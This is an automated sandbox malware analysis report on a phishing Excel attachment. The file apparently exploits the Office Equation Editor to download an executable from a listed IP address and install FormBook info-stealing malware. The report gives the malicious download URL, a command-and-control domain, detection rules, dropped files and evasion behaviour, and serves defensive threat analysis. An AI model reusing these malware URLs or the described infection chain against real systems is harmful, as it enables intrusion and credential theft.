Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_037903A2

Source: global traffic

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_0040580F

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE	Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403646

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B51890	5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B596A0	5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B57E88	5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B59C12	5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5C3BD	5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5A184	5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5B3F1	5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00110A56	5_2_00110A56

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: PO 65738963578 Revise Settlement.xlsx	Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx	ReversingLabs: Detection: 29%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_00403646

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404ABB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B52445 push ecx; ret

5_2_00B52458

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\idcqz.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_037903A2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B51890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00B51890

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_5-7812

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 544

Thread sleep time: -420000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_5-6913

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-1613
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-1694
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-1636
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-1593
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-1967
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node	graph_4-3510
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	API call chain: ExitProcess graph end node	graph_5-6914

Source: vbc.exe, 00000004.00000002.984898128.0000000000944000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B57A95 IsDebuggerPresent,

5_2_00B57A95

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B5558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_00B5558A

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B586ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

5_2_00B586ED

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0379046B mov edx, dword ptr fs:[00000030h]	2_2_0379046B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]	5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]	5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]	5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]	5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]	5_2_001103F8

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B5439B SetUnhandledExceptionFilter,		5_2_00B5439B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Code function: 5_2_00B543CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		5_2_00B543CC

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe	Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B53283 cpuid

5_2_00B53283

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe

Code function: 5_2_00B53EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00B53EC8

Source: C:\Users\Public\vbc.exe

4_2_00403646

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	1 Access Token Manipulation	111 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	11 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	121 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Scripting	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	16 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO 65738963578 Revise Settlement.xlsx	41%	Virustotal		Browse
PO 65738963578 Revise Settlement.xlsx	29%	ReversingLabs	Win32.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.3.EQNEDT32.EXE.998472.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.3.EQNEDT32.EXE.931118.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.3.EQNEDT32.EXE.998472.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.EQNEDT32.EXE.931118.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.2.idcqz.exe.160000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
www.cortesdisenosroutercnc.com/itq4/	100%	Avira URL Cloud	malware
http://198.12.81.20/busy/BUSY.exeC:	100%	Avira URL Cloud	malware
http://198.12.81.20/busy/BUSY.exeiiC:	100%	Avira URL Cloud	malware
http://198.12.81.20/busy/BUSY.exej	100%	Avira URL Cloud	malware
http://198.12.81.20/busy/BUSY.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.cortesdisenosroutercnc.com/itq4/	true	Avira URL Cloud: malware	low
http://198.12.81.20/busy/BUSY.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr	false		high
http://198.12.81.20/busy/BUSY.exeC:	EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://198.12.81.20/busy/BUSY.exeiiC:	EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://198.12.81.20/busy/BUSY.exej	EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.12.81.20	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626146
Start date and time: 13/05/202216:40:44	2022-05-13 16:40:44 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO 65738963578 Revise Settlement.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
